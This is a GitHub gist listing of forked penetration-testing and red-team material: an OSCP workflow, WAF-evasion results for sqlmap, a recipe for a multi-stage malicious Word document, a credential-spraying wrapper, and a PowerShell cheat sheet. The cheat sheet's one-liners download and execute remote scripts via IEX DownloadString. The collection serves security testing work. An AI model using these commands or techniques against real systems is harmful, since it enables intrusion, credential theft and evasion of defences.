
@secfb
secfb / offsec.md
Created April 26, 2018 07:25 — forked from jivoi/offsec.md
Penetration Testing/Assessment Workflow

Penetration Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tips and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscan from the CLI, nmap from within msfconsole so the results are stored in the Metasploit database.

@secfb
secfb / enum.sh
Created May 17, 2018 10:42 — forked from unfo/enum.sh
Linux priv esc. Might be out-dated script versions
#!/bin/bash
BLACK="\033[30m"
RED="\033[31m"
GREEN="\033[32m"
YELLOW="\033[33m"
BLUE="\033[34m"
PINK="\033[35m"
CYAN="\033[36m"
WHITE="\033[37m"
@secfb
secfb / sqlmap-tamper-scripts-evaluation.md
Created May 26, 2018 22:32 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The table below shows the results of tests launched against an F5 Big-IP ASM WAF appliance in its XX version of YY and ZZ version of XY.

The names below are to be passed to the --tamper= parameter of sqlmap.

The Violation Rating column gives the most frequent rating among the top 20 requests observed by F5 in its Security >> Event Logs : Application : Requests view.

The scale is 0-5.

@secfb
secfb / muti-stage-1.md
Created May 26, 2018 22:35 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The paper below documents the process of creating a multi-stage, IPS/AV-transparent malicious document for Red Teaming / Penetration-Testing assignments.

The resulting document will be:

  • using the OLE event autorun method
  • removing its pretext shapes
  • obtaining the commands to be executed from the document's Author property and passing them to the StdIn of a Powershell.exe process
  • leveraging the certutil technique to receive a Base64-encoded malicious HTA document
  • carrying a Base64-encoded Powershell command in that Author property
@secfb
secfb / smb_cme_credspray.sh
Created May 28, 2018 12:04 — forked from ryan-wendel/smb_cme_credspray.sh
A wrapper around CrackMapExec to help prevent locking accounts when credential spraying SMB services.
#!/bin/bash
HOST="$1"
USERS="$2"
PASSWORDS="$3"
SLEEP="$4"
EMAIL="idrinkyourmilkshake@foobarbbq.com"
TEXT="7205551234@mms.att.net"
@secfb
secfb / CTFWRITE-Optimum-HTB.md
Created May 28, 2018 12:23 — forked from berzerk0/CTFWRITE-Optimum-HTB.md
CTF-Writeup: Optimum @ HackTheBox

This gist has been DEPRECATED.

Updates will be reflected on GITPAGE VERSIONS ONLY

CTF Writeup: Optimum on HackTheBox

30 October 2017

Introduction

This was one of my first capture the flags, and the first HTB to go retired while I had a good enough grasp of it to do a write up. The steps are directed towards beginners, just like the box.

@secfb
secfb / windows-toolkit.md
Created December 28, 2018 11:49 — forked from jthuraisamy/windows-toolkit.md
Windows Toolkit

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed
@secfb
secfb / RedTeam_CheatSheet.ps1
Created May 19, 2019 13:44 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"